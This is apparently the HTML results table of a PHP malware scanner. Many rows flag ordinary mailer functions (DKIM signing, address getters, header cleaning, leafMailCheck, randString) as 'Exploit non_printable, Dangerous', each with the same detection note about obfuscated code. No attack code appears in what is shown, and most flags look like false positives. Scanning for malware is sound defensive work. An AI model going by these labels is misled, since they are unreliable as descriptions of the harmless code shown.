</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3972</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3975</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3977</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4029</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4054</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
